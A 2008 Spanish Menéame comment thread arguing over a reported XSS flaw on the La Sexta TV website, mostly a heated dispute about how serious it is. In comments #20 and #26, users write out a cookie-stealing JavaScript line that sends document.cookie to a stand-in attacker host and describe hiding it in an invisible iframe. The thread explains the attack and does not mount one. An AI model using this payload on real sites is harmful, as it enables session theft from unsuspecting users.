Menéame: comentarios [460039]

#96 Agujero de seguridad grave en La Sexta

Kartoffel — Mon, 01 Sep 2008 23:49:28 +0000

Ojo con el trol que anda llamando 'juankers' a los demás y no sabe lo que son los parámetros URL: meneame.net/story/panfleto-digital-libertad-digital#comment-3

» autor: Kartoffel

#95 Agujero de seguridad grave en La Sexta

--23321-- — Sat, 30 Aug 2008 01:54:38 +0000

#93 que la idea y el concepto están plagiados? es interesante ver que ahora hasta el "buscar bugs" tiene copyright, y se puede plagiar, incluso cuando es en sites diferentes.

Cuanto daño hace la sgae

» autor: --23321--

#94 Agujero de seguridad grave en La Sexta

DZPM — Fri, 29 Aug 2008 17:29:38 +0000

Los comentarios de la noticia son pura poesía

rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta
"Pues nose, igual tu y tu abuela tuerta sois los reyes del universo, porque yo he estudiado informática y no sé hacer esto.. será que soy de redes."

» autor: DZPM

#93 Agujero de seguridad grave en La Sexta

StoneBeat — Fri, 29 Aug 2008 17:09:00 +0000

No habia caido en eso #92 pero como decia en #67, además, la idea y el concepto estan plagiados ...

» autor: StoneBeat

#92 Agujero de seguridad grave en La Sexta

Voyager — Fri, 29 Aug 2008 16:54:12 +0000

Una nota antes de cerrar,

El blog "desvarios informáticos" (por cierto nombre apropiado) fue creado el 28-8-2008 a las 21:05

Sólo tiene dos artículos, creados a la misma hora...

Hmmm... aquí alguien quiere ocultar algo!

rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta

» autor: Voyager

#91 Agujero de seguridad grave en La Sexta

Voyager — Fri, 29 Aug 2008 16:33:13 +0000

Doy por concluida mi intervencion en esta "noticia"

Quien tenga ojos que lea.

» autor: Voyager

#90 Agujero de seguridad grave en La Sexta

--23321-- — Fri, 29 Aug 2008 14:25:35 +0000

Estamos entrando como bobos en el juego de un troll (yo incluido).

Estamos hablando en términos de seguridad mas o menos serios, que nos importa lo que diga un troll que ya se ha visto que solo busca crear un flame? es un troll de libro.

ya lo dije arriba: DON'T FEED THE TROLL

Va a continuar diciendo lo que dice una y otra vez, para alargar el flame.

» autor: --23321--

#89 Agujero de seguridad grave en La Sexta

Ap0 — Fri, 29 Aug 2008 14:00:00 +0000

#88 no te das cuenta que nadie quiere demostrar nada? que eres tu el unico que le sigue dando vueltas a todo?

» autor: Ap0

#88 Agujero de seguridad grave en La Sexta

Voyager — Fri, 29 Aug 2008 13:18:00 +0000

#87: No lo llevo diciendo hace muchos posts? El fallo existe pero no es grave. Sería grave si el admin ejecutara el script y además con esa cookie se tuviera acceso de escritura a toda la web.

Prueba de ello es que aun nadie ha modificado la web. A estar alturas deberia estar ya modificada.

» autor: Voyager

#87 Agujero de seguridad grave en La Sexta

NachE — Fri, 29 Aug 2008 12:13:24 +0000

Que cansinos con el tema... #82 Aceptas ya que el fallo existe? ...Independientemente de si es grave o no...

» autor: NachE

#86 Agujero de seguridad grave en La Sexta

Voyager — Fri, 29 Aug 2008 11:54:44 +0000

#84: Señor "experto en seguridad", sólo podrás hacer eso si el admin es tan tonto de pinchar en tu exploit o no navegar con el NoScript (algo BASICO si sabes algo de seguridad y administras una web)

Es decir, para conseguir la cookie de admin, admin debe ejecutar el exploit. Y aunque lo ejecutara. sólo podrías modificar su foro, no la web completa...

Saludos de un "lammer"

» autor: Voyager

#85 Agujero de seguridad grave en La Sexta

ApolloXXX — Fri, 29 Aug 2008 11:39:32 +0000

#84: ¿Te he insultado yo a ti? Iba a responderte, pero con tu nula educación paso de hacerlo.

» autor: ApolloXXX

#84 Agujero de seguridad grave en La Sexta

DZPM — Fri, 29 Aug 2008 11:11:18 +0000

#83
Basta con que uses este XSS para obtener la cookie del admin, con eso tendrás acceso de escritura a la web y podrás cambiar la foto del tipo ese por la de un perro haciendo caca. ¿Contento?

Yo flipo como tanta gente "entiende" de seguridad, pero solo cuando pueden ejecutar un exploit... menuda panda de lamers.

» autor: DZPM

#83 Agujero de seguridad grave en La Sexta

ApolloXXX — Fri, 29 Aug 2008 11:01:29 +0000

Creo entender lo que dice Voyager. Se refiere a que no se puede decir en el titular que el fallo es grave, porque no afecta al dominio principal de la sexta.

Vamos, que el follonero si se entera, no va a entender que puede repercutir este fallo contra el gran fallo de modificar la wiki.

SI al menos hubierais descubierto como modificar la web del follonero

www.lasexta.com/programa/salvados/eurocopa/471

pues eso si que sería grave (al menos para él)

» autor: ApolloXXX

#82 Agujero de seguridad grave en La Sexta

Voyager — Fri, 29 Aug 2008 10:34:37 +0000

#74 Y tu un prepotente.

No es un fallo de seguridad GRAVE, en todo caso un fallo de seguridad en la escala de Secunia "Less Critical (2 of 5)"

Debido a que ese foro no lo conoce ni Dios, quien va a querer entrar el el foro de la Sexta habiendo MILLONES de foros mejores y dudo que alguien que lo visite se registre y te mande sus cookies, ya que es abierto a visitantes...

para lo que hay que ver ahi quien se va a registrar...

Un poco de humildad, que te crees Dios... dime de que presumes...

Y me da igual que tu o tus neonicks o palmeros me voten negativo... si me pusiera a hacer lo mismo que vosotros estaria a vuestro nivel.

Un poco de madurez, chavales...

» autor: Voyager

#81 Agujero de seguridad grave en La Sexta

unf — Fri, 29 Aug 2008 08:51:22 +0000

#78, la posibilidad de robar una cuenta de usuario es grave. Existe la ley de protección de datos.

» autor: unf

#80 Agujero de seguridad grave en La Sexta

KaiserSoze — Fri, 29 Aug 2008 07:28:33 +0000

Algo asi ya dije yo en su dia:
meneame.net/story/programa-follonero-sexta-vandaliza-wikipedia-para-br

» autor: KaiserSoze

#79 Agujero de seguridad grave en La Sexta

tocameroque — Fri, 29 Aug 2008 06:49:36 +0000

El "agujero de seguridad" lo tienen algunos que trabajan en la sexta

» autor: tocameroque

#78 Agujero de seguridad grave en La Sexta

gan — Fri, 29 Aug 2008 06:49:07 +0000

#76 Yo lo he entendido perfectamente. El caso es que para mi, aun siendo un agujero de seguridad, solamente sería grave si algun admin de la web de la sexta entrase por ese enlace, en ese caso si que lo consideraria grave.

Es decir, como fallo de seguridad, en concepto, es grave, pero a la hora de la verdad, dudo que un admin competente entre a ese enlace.

Pero ahi ya entra lo que cada uno considere grave, si la posibilidad, o el riesgo real. Y por eso se ha montado todo este pollo.

» autor: gan

#77 Agujero de seguridad grave en La Sexta

Mastin_zgz — Fri, 29 Aug 2008 06:30:03 +0000

jcarlosn, DZPM Quien eres? Vienes a por mi? AaAaAaAaAaaaAaa
soy el unico que le suena a chino todo eso de exploit y XSS?
no te acostaras....

» autor: Mastin_zgz

#76 Agujero de seguridad grave en La Sexta

natrix — Fri, 29 Aug 2008 03:58:35 +0000

#73 Creo que hasta yo lo he entendido. A ver si te lo explico en mis términos de hijnorante de la hinformática y lo entiendes:

El malo se hace una web: www.lasextaeslahostia.com
El malo mete en esa web un iframe (que yo ni sabía lo que era) que lleva un código que empieza por "document.location="
El malo se pasa por los foros de la sexta, Pilar Rubio, Patricia Conde y Buenafuente y le dice a la gente que visto una web que es la leche de buena.
El pardillo entra en la web www.lasextaeslahostia.com y se activa el código del iframe, que manda las cookies del pardillo (las que tiene en su ordenador para entrar en www.lasexta.com) a la web del malo.
El malo tiene el user + pass del pardillo.

Si me he equivocado, es culpa vuestra que no hay quien os entienda.

P.D: #20 No sé qué has puesto en ese enlace que se me ha encendido el Firefox+script como nunca.

» autor: natrix

#75 Agujero de seguridad grave en La Sexta

ermaestro — Fri, 29 Aug 2008 02:55:22 +0000

los hay mayores: agosto y los becarios!!!

» autor: ermaestro

#74 Agujero de seguridad grave en La Sexta

--23321-- — Fri, 29 Aug 2008 02:48:38 +0000

#73 me reitero, en términos de seguridad, eres un ignorante.

» autor: --23321--

#73 Agujero de seguridad grave en La Sexta

Voyager — Fri, 29 Aug 2008 02:44:08 +0000

Que he quedado mal? Dejalo?

A ver si te explico el "problema".

Resulta que la Web tiene una vulnerabilidad XSS "grave" segun el autor del blog. me digo, yo, será un sitio muy visitado, con repercusión, y que será muy fácil hacerle caer en XSS (por ejemplo colgarle un banner). Pero no, consiste en que sólo obtienen las cookies de unos usuarios que quiza ni entren jamás al blog donde esté el iframe con el código que ejecuta la vulnerabilidad...

Recordemos que el titulo prometía que la WEB DE LA SEXTA tenía una vulnerabilidad GRAVE. Todos nos imaginamos que podemos poner una foto de Pilar Rubio en bolas, o vete a saber que... pero no.. la vulnerabilidad sólo afecta a un kutreforo, que nadie visita, y que el "payload" por esta suculenta vulnerabilidad es... oh wait! loggearse como 3 o 4 usuarios perdidos de ese foro que ejecuten el XSS script!

Y esto ha llegado a portada!

Y nada... reirse del descubrimiento del "juanker" sólo provoca que los amigotes del "juanker", por cierto, el autor del blog escribia lo mismo que el autor del post aqui lo solapen y reconstruyan su denostado ego...

Pues fale... es una GRAN vulnerabilidad... los cimientos de Internet tiemblan sólo de pensar en que la han descubierto.. plas plas, palmaditas en la cabeza... anda, vete a buscar otra vulnerabilidad

en fin...

» autor: Voyager

#72 Agujero de seguridad grave en La Sexta

--58130-- — Fri, 29 Aug 2008 01:23:19 +0000

#17

Meterse con la iglesia -> no perjudica directamente a nadie.

Meterse con la Wikipedia -> no perjudica directamente a nadie.

Vandalizar la Wikipedia -> puede perjudicar a alguien.

Que se meta con la Wikipedia todo lo que quiera, pero que no altere su información.

» autor: --58130--

#71 Agujero de seguridad grave en La Sexta

mdotg — Fri, 29 Aug 2008 01:22:52 +0000

Owned para Voyager: dejalo tio, que ya has quedado bastante mal.
Finalizar los mensajes con caritas felices no ayuda .
Y es más, me has hecho hasta registrarme tras llevar ya mucho tiempo siendo anónimo

» autor: mdotg

#70 Agujero de seguridad grave en La Sexta

unf — Fri, 29 Aug 2008 01:15:58 +0000

#17, ¿acaso es malo ser crítico? Alucino.

» autor: unf

#69 Agujero de seguridad grave en La Sexta

StoneBeat — Fri, 29 Aug 2008 00:35:52 +0000

Mismo tipo de bug, misma linea argumental de no revelacion, misma motivacion (wikipedia). Lo unico que cambia es la-sexta por a3. IMHO

» autor: StoneBeat

#68 Agujero de seguridad grave en La Sexta

--23321-- — Fri, 29 Aug 2008 00:19:11 +0000

#67 en tu enlace hablan de un bug de antena3, y rooibo habla de un bug en la sexta.

No veo relación.

» autor: --23321--

#67 Agujero de seguridad grave en La Sexta

StoneBeat — Fri, 29 Aug 2008 00:07:19 +0000

Ejercicio para avispados: comparen www.securitybydefault.com/2008/08/tica.html con la URL del articulo aquí referenciado. Luego cotejen fechas

» autor: StoneBeat

#66 Agujero de seguridad grave en La Sexta

Voyager — Thu, 28 Aug 2008 22:21:45 +0000

helmer: Que error... si me dice que sólo puede conseguir las cookies de los usuarios que hayan visto esta noticia en menéame.

Y el resto? Si el admin nunca se pasa por aqui, nunca podremos suplantarle?

» autor: Voyager

#65 Agujero de seguridad grave en La Sexta

Moussenger — Thu, 28 Aug 2008 22:17:17 +0000

Voyager, asi de risas, para ya. Que cansino eres hijo, por dios.

» autor: Moussenger

#64 Agujero de seguridad grave en La Sexta

--91323-- — Thu, 28 Aug 2008 22:15:18 +0000

[Usuario deshabilitado]

» autor: --91323--

#63 Agujero de seguridad grave en La Sexta

Voyager — Thu, 28 Aug 2008 22:12:46 +0000

Vale, y una vez que caigan unos cientos... (2-3 diria yo)

Que sentido tiene entrar en unforo de la sexta que NADIE conoce?

Estais comparando vandalizar la Wikipedia, con entrar en un foro que ni DIos sabe que existe?

» autor: Voyager

#62 Agujero de seguridad grave en La Sexta

--23321-- — Thu, 28 Aug 2008 22:10:49 +0000

#61 y por que a todos? basta con enviarlo a meneame, digg, o a foros/comentarios etc de la sexta o los medios que esa web disponga, para que caigan unos cientos.

Y ya no voy a seguir, lo siento.

DON'T FEED THE TROLL

» autor: --23321--

#61 Agujero de seguridad grave en La Sexta

Voyager — Thu, 28 Aug 2008 22:04:33 +0000

Pues ves? si en lugar de ponerse en plan "juanker" a pavonearse, me dice que lo pone en su blog, en un iframe, ya nos podriamos haber puesto de acuerdo.

Ahora viene a donde yo quiero ir.

Como obligas a TODOS los users a ir a leer la noticia a tu blog? Con iman positronico?

» autor: Voyager

#60 Agujero de seguridad grave en La Sexta

--2516-- — Thu, 28 Aug 2008 22:03:44 +0000

[Usuario deshabilitado]

» autor: --2516--

#59 Agujero de seguridad grave en La Sexta

--23321-- — Thu, 28 Aug 2008 22:02:26 +0000

#57 lo podría haber puesto rooibo en un iframe invisible de su noticia, la cual has leído, ergo, has seguido su enlace, por lo cual, ya tendría tu cookie de la sexta.

» autor: --23321--

#58 Agujero de seguridad grave en La Sexta

Voyager — Thu, 28 Aug 2008 22:02:24 +0000

por cierto, 2+2 son 100

» autor: Voyager

#57 Agujero de seguridad grave en La Sexta

Voyager — Thu, 28 Aug 2008 22:00:48 +0000

Vale, psk. nos vamos entendiendo... pero porque voy a seguir un enlace? Donde pones ese enlace o lo publicas aqui en meneame? Si no pincho el enlace no hay cross-site scripting...

» autor: Voyager

#56 Agujero de seguridad grave en La Sexta

--30459-- — Thu, 28 Aug 2008 21:57:51 +0000

[Usuario deshabilitado]

» autor: --30459--

#55 Agujero de seguridad grave en La Sexta

--55828-- — Thu, 28 Aug 2008 21:57:51 +0000

#47 ¿pero qué rebatir Voyager? Te están diciendo que 2+2=4 y tú le estás diciendo que si no te hacen una demostración de que 2+2=4 no te lo crees. Es tan sencillo lo que te explican y tan absurdo la demostración que pides que no es necesario hacer nada.

Bastaría con que siguieras un enlace para que tu cookie saliera de tu equipo y fuera a terminar a un servidor QUE NO ES el de la sexta. Tan fácil como eso. Una vez sucedido, el dueño del servidor para el que se haya programado el "exploit" tiene acceso a tu cookie y por tanto a tu sesión.

Repite conmigo: 2+2=4.

» autor: --55828--

#54 Agujero de seguridad grave en La Sexta

--30459-- — Thu, 28 Aug 2008 21:57:21 +0000

[Usuario deshabilitado]

» autor: --30459--

#53 Agujero de seguridad grave en La Sexta

Feagul — Thu, 28 Aug 2008 21:56:26 +0000

Bueno volviendo al tema que tratábamos... Soy el único que cuando ha leído "Agujero en la sexta" ha pensado en Pilar Rubio?

EDITO: #52 también la mente. La culpa es de los Bloggers que las "suben" como putas

» autor: Feagul

#52 Agujero de seguridad grave en La Sexta

--23321-- — Thu, 28 Aug 2008 21:55:35 +0000

#51 yo no he hablado de sexo, solo dormimos en la misma cama, nada mas!

Tienes la mirada sucia

» autor: --23321--

#51 Agujero de seguridad grave en La Sexta

Feagul — Thu, 28 Aug 2008 21:54:28 +0000

#50 Eres maquinista o último vagón? Lo digo por que por ahí hay una noticia de un homosexual censurado en los juegos!

» autor: Feagul

#50 Agujero de seguridad grave en La Sexta

--23321-- — Thu, 28 Aug 2008 21:52:53 +0000

#48 claro, cuando te acuestas con r0uzic, automáticamente obtienes protección de algo que llaman "la mafia de meneame" y te sube el karma a 200.

» autor: --23321--

#49 Agujero de seguridad grave en La Sexta

Ap0 — Thu, 28 Aug 2008 21:52:23 +0000

#45 Desde cuando?!

» autor: Ap0

#48 Agujero de seguridad grave en La Sexta

Feagul — Thu, 28 Aug 2008 21:51:43 +0000

#45 Y por eso el otro usuario no puede comentarte algo? EDITO: Ahora has puesto el modo irónico eh pillin?

» autor: Feagul

#47 Agujero de seguridad grave en La Sexta

Voyager — Thu, 28 Aug 2008 21:50:27 +0000

#43 Feagul: Es un juanker... parece mentira... no ves lo alterados que se ponen cuando alguien les rebate?

» autor: Voyager

#46 Agujero de seguridad grave en La Sexta

--55828-- — Thu, 28 Aug 2008 21:50:14 +0000

Voyager ponte a estudiar y pásate de nuevo por aquí cuando termines la ESO. Has demostrado que estos asuntos te quedan grandes.

» autor: --55828--

#45 Agujero de seguridad grave en La Sexta

--23321-- — Thu, 28 Aug 2008 21:48:57 +0000

#43 <ironic>me dedico a acostarme con r0uzic</ironic>

» autor: --23321--

#44 Agujero de seguridad grave en La Sexta

--30459-- — Thu, 28 Aug 2008 21:48:13 +0000

[Usuario deshabilitado]

» autor: --30459--

#43 Agujero de seguridad grave en La Sexta

Feagul — Thu, 28 Aug 2008 21:46:00 +0000

#40 A que se dedica? Ya estoy intrigado! Es de la mafia o algo así?

» autor: Feagul

#42 Agujero de seguridad grave en La Sexta

DZPM — Thu, 28 Aug 2008 21:45:50 +0000

#39: ¿Pero que dices, flipao? ¿Modificar el server?

Culturízate un poco, si vas de sobrao, sin tener ni idea del tema, quedas fatal:

en.wikipedia.org/wiki/Cross-site_scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. As of 2007, cross-site scripting carried out on websites were roughly 80% of all documented security vulnerabilities.[1] Often during an attack "everything looks fine" to the end-user[2] who may be subject to unauthorized access, theft of sensitive data, and financial loss.[3]

» autor: DZPM

#41 Agujero de seguridad grave en La Sexta

--23321-- — Thu, 28 Aug 2008 21:45:42 +0000

#39 me parece increible que aún no entiendas como funciona un XSS, después de mi comentario en #26, que por ejemplo #35 y #40 han comprendido perfectamente.

No lo voy a re-explicar por enésima vez, te recomiendo que leas:

en.wikipedia.org/wiki/Cross-site_scripting#Exploit_scenarios

Donde aclaran todo esto a la perfección.

Ah, espera, que en wikipedia también son unos fantasmas?

» autor: --23321--

#40 Agujero de seguridad grave en La Sexta

--30459-- — Thu, 28 Aug 2008 21:44:22 +0000

[Usuario deshabilitado]

» autor: --30459--

#39 Agujero de seguridad grave en La Sexta

Voyager — Thu, 28 Aug 2008 21:42:42 +0000

#31:

A ver... si solo quieres convencer a newbies, no te preocupes... pero para INYECTAR código, necesitas modificar en el SERVIDOR atacado, el codigo para que la gente al loggearse te envie sus cookies... toda tu argumentacion se cae por sí sola, en el momento que no ejecutas código en el servidor atacado, sólo en el tu navegador... y como mucho en tu servidor atacante... pero NUNCA en el servidor atacado.

Lo que me demuestra que no estoy equivocado, es que te has salido por peteneras ante mi reto de loggearte en lasexta con mi nick...

Aqui no hay XSS desde el momento en que eso no es una vulnerabilidad XSS

» autor: Voyager

#38 Agujero de seguridad grave en La Sexta

DZPM — Thu, 28 Aug 2008 21:41:19 +0000

#32
> (...) que decian "solo me creo que sepas algo si me hackeaaas, te doy mi ip? la quieres? va va va a ver que h4x0r eres!!"

Mucho mejor los que decían "Soy un jaker peligroso y si me das tu IP te juankeo", y le confesabas que tu IP es la 127.80.13.28...

A Voyager (#27 y demás), si una fuente no-fiable ejecuta javascript en tu máquina te ha own3ado, así de sencillo... y, como prueba de concepto, ¿quierer ir a meatspin o prefieres un bucle infinito?

» autor: DZPM

#37 Agujero de seguridad grave en La Sexta

--23321-- — Thu, 28 Aug 2008 21:38:03 +0000

#35 exacto, en eso reside todo lo que rodea a los bugs XSS

» autor: --23321--

#36 Agujero de seguridad grave en La Sexta

--91323-- — Thu, 28 Aug 2008 21:37:42 +0000

[Usuario deshabilitado]

» autor: --91323--

#35 Agujero de seguridad grave en La Sexta

B4rret — Thu, 28 Aug 2008 21:36:00 +0000

#26 Ok gracias, ya lo he terminado de entender.
Es que estaba volviendo a dudar, ya que me quede pensando que ejecutar la instruccion que lee la cookie lo puede hacer sin necesidad de usar ninguna pagina externa, pero no me daba cuenta que asi solo consigue la cookie del dominio de la web que usamos y no la de la web con la vulnerabilidad ^_^U

» autor: B4rret

#34 Agujero de seguridad grave en La Sexta

lalvarez — Thu, 28 Aug 2008 21:35:57 +0000

Yo no tengo idea de javascript ni estas cosas, por eso no puedo saber exactamente si hay algo mal o no. Pero he de decir que cualquier fallo o vulnerabilidad en las páginas de laSexta no me extraña un pelo. Si supierais cómo se hacen...

» autor: lalvarez

#33 Agujero de seguridad grave en La Sexta

Feagul — Thu, 28 Aug 2008 21:35:30 +0000

#30 Por eso tienes esa mierda de karma

#24 Doy fe que esa no es la web de este hombre. Le conozco de varios foros.
Aún así Voyager ni yo mismo me creería la escusa que diste. En meneame tienes más posibilidades de ser creído si dices que eres un HOYGAN borracho

» autor: Feagul

#32 Agujero de seguridad grave en La Sexta

Ap0 — Thu, 28 Aug 2008 21:34:42 +0000

#27 leer tu comentario me ha recordado a las antigüas charlas de irc en canales de "informatica" que decian "solo me creo que sepas algo si me hackeaaas, te doy mi ip? la quieres? va va va a ver que h4x0r eres!!"

resulta un comentario un tanto infantil e hipócrita por tu parte.
Ah, respecto a lo de los fantasmas, has probado a mirarte en un espejo?

» autor: Ap0

#31 Agujero de seguridad grave en La Sexta

--23321-- — Thu, 28 Aug 2008 21:34:00 +0000

#27 no se que imagen tienes de mi, de rooibo, o de ninguna de las personas que se dedican a esto profesionalmente, pero desde luego, no te van a robar ninguna cuenta, ni a ti ni a nadie, eso puedes tenerlo claro.

Explotar estos agujeros es un delito tipificado en la ley española, no se si estás al tanto.

Y es un delito, que de denunciar, denunciaría la sexta, y no tu, por lo que nadie va a caer en el juego de explotar este agujero solo para demostrarte nada, estas cosas requieren un uso responsable, y ni mucho menos, nadie se va a poner a hacer ataques contra la sexta por un flame en el meneame, eso sería muy infantil.

» autor: --23321--

#30 Agujero de seguridad grave en La Sexta

Voyager — Thu, 28 Aug 2008 21:28:45 +0000

#28: Feagul, buscando fantasmas... ya sabes lo tokapelotas que suelo ser...

» autor: Voyager

#29 Agujero de seguridad grave en La Sexta

Voyager — Thu, 28 Aug 2008 21:28:06 +0000

#24: las paginas personales no se ponen en dominios free como kwikphp

No es una excusa... es una pagina de pruebas

» autor: Voyager

#28 Agujero de seguridad grave en La Sexta

Feagul — Thu, 28 Aug 2008 21:27:19 +0000

#21 Voyager ? jajaja Que hace usted por aquí?

» autor: Feagul

#27 Agujero de seguridad grave en La Sexta

Voyager — Thu, 28 Aug 2008 21:26:52 +0000

A ver... dejate de teorias... (dile al autor) que me he creado un usuario con el nick Voyager, en la comunidad de la Sexta...

Si se loggea como yo y pone un post, me habrá convencido.

Si no, deduciré que es solo una fantasmada...

hace?

» autor: Voyager

#26 Agujero de seguridad grave en La Sexta

--23321-- — Thu, 28 Aug 2008 21:25:14 +0000

#23 y #25 a ver... lo voy a explicar para aclarar un poco, pese a que rooibo no ha querido dar mas detalles, entiendo que la gente no va a creer que hay un bug, sin darles mas información.

Si existe una posibilidad, de controlar código javascript que entra por los argumentos, como es el caso, para leer la cookie del usuario, en el contexto de su sesión (su cookie local, vaya), se puede crear una petición en lugar de:

alert(document.cookie);

pues:

document.location='http://paginadelatacante.com/insertarcookie.php?cookie='+document.cookie;

y todo el enlace, con el xss, y ese código inyectado en el, meterlo en un iframe de 0x0 (invisible) en una web que controlemos, ya solo nos falta que la gente entre a nuestra web (una web normal), para que el iframe ejecute la petición, se produzca el XSS y con ello, la redirección, pasando la cookie a la web del atacante, insertarcookie.php podría ir insertando todas las cookies que recibe en una base de datos, para que luego el atacante, las pudiese utilizar. Y todo ello, sin que se vea nada ni el usuario haga nada, mas que visitar una web, que podría divulgarse entre los usuarios de dicha web, como se ha hecho en el pasado con bugs similares.

Y creo que ya se han dado demasiado detalles

» autor: --23321--

#25 Agujero de seguridad grave en La Sexta

--30459-- — Thu, 28 Aug 2008 21:21:32 +0000

[Usuario deshabilitado]

» autor: --30459--

#24 Agujero de seguridad grave en La Sexta

--23321-- — Thu, 28 Aug 2008 21:19:03 +0000

#21

Lo primero tu dices:

Esa es una copia para que los aprendices de hacker jueguen ser hacker

No creeras que voy a poner la original..

Es la excusa mas pobre que he leído en todo el tiempo que llevo dedicándome profesionalmente a la seguridad, creeme, es la peor. La gente suele decir cosas como: "Es que no es la página definitiva" o cosas así, pero tu excusa no hay por donde cogerla.

Lo segundo, tu dices:

Lo que se consigue con esa "cookie" es una cookie local. Necesitas el password encriptado en MD5 para poder autentificarte como usuario... con esa cookie LOCAL poco podras hacer...

No hace falta que el autor de mas detalles... es que NO los hay

Lo que demuestras con eso, es una completa ignorancia en el campo de desarollo web, como sabrá cualquiera que no lea y programe webs.

Si le robas la cookie local a un usuario, le robas la única pieza de información que mantiene vivo el contexto de sesión, por lo cual, al utilizarla, automáticamente utilizas su sesión con sus privilegios, pero vaya, que todo esto está documentado en wikipedia, por si quieres aprender un poco mas sobre XSS.

Los XSS, son según securityfocus el agujero mas peligroso en relación abundancia-riesgo, pero entiendo que tu has venido hasta aquí, al meneame, a contradecir lo que dicen los principales expertos del mundo.

Lo siento, pero me saca de mis casillas la gente como tu.

» autor: --23321--

#23 Agujero de seguridad grave en La Sexta

B4rret — Thu, 28 Aug 2008 21:18:04 +0000

Uhm, tengo el javascript un poco dejado y no me he puesto a hacer muchas pruebas, pero juraría que este comentario tiene razón: rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta
Vamos, que yo sepa document.cookie muestra la cookie de uno mismo siempre... No devuelve nada que haya guardado en el servidor, y menos lo de otro usuario, asi que no acabo de ver que gana con eso...

Aparte es que se puede ver con su propio ejemplo. Si eso realmente devolviera una cookie de un usuario, entonces si se mete un usuario que no existe no debería devolver nada. Ain embargo su ejemplo con el usuario "lol" que no está registrado (al menos en este momento)., si que muestra una cookie, la nuestra propia.

Edito:
#19 Acabo de leer tu comentario, ahora veo por donde va. Sorry por repetirme

» autor: B4rret

#22 Agujero de seguridad grave en La Sexta

Alvarete — Thu, 28 Aug 2008 21:13:48 +0000

Por cierto, viendo el comentario del blog :

rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta

Felicidades chaval, you're retarded, te has llevado el premio "tontolculo del día"

» autor: Alvarete

#21 Agujero de seguridad grave en La Sexta

Voyager — Thu, 28 Aug 2008 21:12:45 +0000

#20 Esa es una copia para que los aprendices de hacker jueguen ser hacker

No creeras que voy a poner la original..

Lo que se consigue con esa "cookie" es una cookie local. Necesitas el password encriptado en MD5 para poder autentificarte como usuario... con esa cookie LOCAL poco podras hacer...

No hace falta que el autor de mas detalles... es que NO los hay

Si te molesta que te llame aprendiz por haber descubierto ese pseudobug, chico aprende un poco antes de postear en meneame

» autor: Voyager

#20 Agujero de seguridad grave en La Sexta

--23321-- — Thu, 28 Aug 2008 21:05:52 +0000

#18

Solo te voy a citar lo que ha contestado el propio autor del blog:

A ver Albert y Vii, sois unos ignorantes, al tener código Javascript que se ejecuta y que se puede controlar, basta con crear un enlace, con un código estilo:

document.location=’http://evil.com/index.php?c=’+document.cookie+’;

Para pasar la cookie a un tercero, mediante get.

Para conseguir que alguien visite ese enlace, basta insertarlo en un iframe invisible en cualquier web, y esperar a que vayan cayendo cookies.

Cuanta ignorancia, por dios

Y yo mismo lo he probado, no solo funciona con usuarios no registrados, pero entiendo que el autor no quiera dar muchos detalles, pues no es bueno facilitarle la vida a posibles delincuentes informáticos.

No entiendo por que en cada noticia de seguridad, aparecen los típicos listillos como tu, soltando tonterías a diestro y siniestro, y negándolo siempre y todo. Según vosotros, los bugs solo son válidos cuando se distribuyen con su prueba de concepto válida para idiotas (descargar y ejecutar), que solo consigue causar perdidas a la empresa.

Se nota mucho que no os dedicáis a la seguridad profesionalmente

Y por cierto #18, tu que eres tan experto en seguridad que en tu propia web (sacada de tu perfil propio de meneame)

voyager.kwikphp.com/wp-content/plugins/

directory listing con disclossure de tus plugins del wordpress, me acuerdo de a mas de uno han hackeado con eso, y la de veces que han dicho lo peligroso que es eso

Que eso no te parece un bug lo suficientemente serio:

&submit=Buscar" title="voyager.kwikphp.com/index.php?s='">&submit=Buscar" rel="nofollow">voyager.kwikphp.com/index.php?s='">#17 Iglesia: Curas pederastas, cinismo, corrupción, están forrados de pasta y hablan del hambre en el tercer mundo...
Wikipedia: Información gratuita al alcance de quien tenga internet, posibilidad de compartir conocimientos editándola...

Si, cambia mucho la cosa...

» autor: --58822--

#18 Agujero de seguridad grave en La Sexta

Voyager — Thu, 28 Aug 2008 21:03:03 +0000

No existe esa vulnerabilidad, solo funcionaria con usuarios no registrados...

Para quedar bien y colarsela a los que no saben, esta bien, pero es poco serio...

» autor: Voyager

#17 Agujero de seguridad grave en La Sexta

indalito — Thu, 28 Aug 2008 21:00:15 +0000

Follonero se mete con la Iglesia: Que guapo tio , es la leche este follonero...

Follonero la lía con la wikipedia: Menudo cabrón mascachapas...

Cuando el tema nos toca de cerca, cambia mucho la cosa...

» autor: indalito

#16 Agujero de seguridad grave en La Sexta

alexwing — Thu, 28 Aug 2008 20:48:41 +0000

Yo he leído agujero y La sexta, y solo pude pensar en Pilar Rubio

» autor: alexwing

#15 Agujero de seguridad grave en La Sexta

Frankss — Thu, 28 Aug 2008 20:48:34 +0000

#13 En la wikipedia lo pone

» autor: Frankss

#14 Agujero de seguridad grave en La Sexta

FulanoK3 — Thu, 28 Aug 2008 20:46:13 +0000

#11 Otro método:

www.gatovolador.kroaton.net/2008/07/20/descargar-videos-de-internet-2-

No querías zas, pues toma dos en toda la boca. Que les den...

» autor: FulanoK3

#13 Agujero de seguridad grave en La Sexta

davidpelayo — Thu, 28 Aug 2008 20:45:04 +0000

Bua, si contara la de cosas que se pueden hacer con tal agujero... Atish, hachazo!

» autor: davidpelayo

#12 Agujero de seguridad grave en La Sexta

amac — Thu, 28 Aug 2008 20:43:53 +0000

[c&p] "...ellos lo que quieren es ser los únicos con el poder de redactar lo que la gente lee..."

+1.

» autor: amac

#11 Agujero de seguridad grave en La Sexta

--15036-- — Thu, 28 Aug 2008 20:38:49 +0000

[Usuario deshabilitado]

» autor: --15036--

#10 Agujero de seguridad grave en La Sexta

A.P.U. — Thu, 28 Aug 2008 20:34:12 +0000

¿está en el medio del 6 no?

» autor: A.P.U.

#9 Agujero de seguridad grave en La Sexta

--27652-- — Thu, 28 Aug 2008 20:25:53 +0000

No hace gracia reírse de uno mismo?

» autor: --27652--

#8 Agujero de seguridad grave en La Sexta

jonolulu — Thu, 28 Aug 2008 20:24:11 +0000

No hay peor cosa que la fanfarronería...

» autor: jonolulu

